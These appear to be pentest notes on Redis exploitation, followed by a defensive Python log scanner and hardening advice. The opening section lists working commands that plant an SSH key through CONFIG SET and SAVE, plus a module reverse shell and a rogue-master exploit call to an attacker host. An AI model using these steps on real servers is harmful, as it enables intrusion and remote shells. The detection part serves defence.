redis exploits

Config get dir Exploit

Note: need to know the home directory of the redis user

# redis-cli -h <IP>
> config get dir
1) "dir"
2) "/var/lib/redis"

# ssh-keygen -f id_rsa
# 3 blank lines before and after key:
# (echo -e "\n\n"; cat id_rsa.pub; echo -e "\n\n") > spaced_id_rsa.txt
# cat spaced_id_rsa.txt| redis-cli -h IP -x set kashz
OK
> config set dir .ssh
OK
> config get dir
"/var/lib/redis/.ssh"
> config set dbfilename "authorized_keys"
OK
> save
OK
# ssh using id_rsa and user

# need to be able to write the module to the target and know the path of the written file

# reverse shell
system.rev IP PORT

master-slave exploit

  • https://github.com/vulhub/redis-rogue-getshell

python3 redis-master.py -r IP -p 6379 -L KALI_IP -P 27017 -f RedisModulesSDK/exp.so -c "id"
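
A defender-side view of the techniques above, as an added example that is not part of the original page: a Python scanner that flags the CONFIG SET dir/dbfilename plus SAVE sequence, and the replication-redirect and MODULE LOAD commands that a master-slave module load relies on, in `redis-cli MONITOR` output. The sample lines, addresses and finding labels are constructed for illustration.

```python
import re
import shlex

# Constructed sample in `redis-cli MONITOR` output format (not captured from a real host).
SAMPLE = r'''
1700000000.000001 [0 203.0.113.5:50100] "set" "kashz" "\n\n\nssh-rsa AAAA...constructed\n\n\n"
1700000001.000001 [0 203.0.113.5:50100] "config" "set" "dir" ".ssh"
1700000002.000001 [0 203.0.113.5:50100] "config" "set" "dbfilename" "authorized_keys"
1700000003.000001 [0 203.0.113.5:50100] "save"
1700000004.000001 [0 10.0.0.7:40000] "get" "session:42"
1700000005.000001 [0 198.51.100.9:41000] "SLAVEOF" "198.51.100.9" "27017"
1700000006.000001 [0 198.51.100.9:41000] "MODULE" "LOAD" "./exp.so"
'''

LINE = re.compile(r'^(\d+\.\d+) \[(\d+) (\S+)\] (.*)$')

def classify(args):
    """Return the finding labels raised by one parsed command."""
    low = [a.lower() for a in args]
    if low[:2] == ["config", "set"]:
        # Redis 7 accepts several name/value pairs in a single CONFIG SET.
        return [f"config-set-{n}" for n in low[2::2] if n in ("dir", "dbfilename")]
    if low and low[0] in ("slaveof", "replicaof") and low[1:3] != ["no", "one"]:
        return ["replication-redirect"]
    if low[:2] == ["module", "load"]:
        return ["module-load"]
    if low and low[0] in ("save", "bgsave"):
        return ["save"]
    return []

def scan(text):
    """Return (client_ip, finding) tuples; correlates the file-write chain per client IP."""
    findings, state = [], {}
    for raw in text.splitlines():
        m = LINE.match(raw.strip())
        if not m:
            continue
        ip = m.group(3).rsplit(":", 1)[0]
        try:
            args = shlex.split(m.group(4))
        except ValueError:
            continue  # unbalanced quoting: skip rather than crash
        seen = state.setdefault(ip, set())
        for label in classify(args):
            if label != "save":
                seen.add(label)
                findings.append((ip, label))
            elif {"config-set-dir", "config-set-dbfilename"} <= seen:
                findings.append((ip, "rdb-file-write-chain"))
    return findings

if __name__ == "__main__":
    for ip, finding in scan(SAMPLE):
        print(f"{ip}\t{finding}")
```

On Redis 7 and later, leaving `enable-protected-configs` and `enable-module-command` at their default of `no` rejects `CONFIG SET dir`/`dbfilename` and `MODULE LOAD` from clients. Requiring authentication and binding to a non-public interface closes the unauthenticated access these steps assume.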
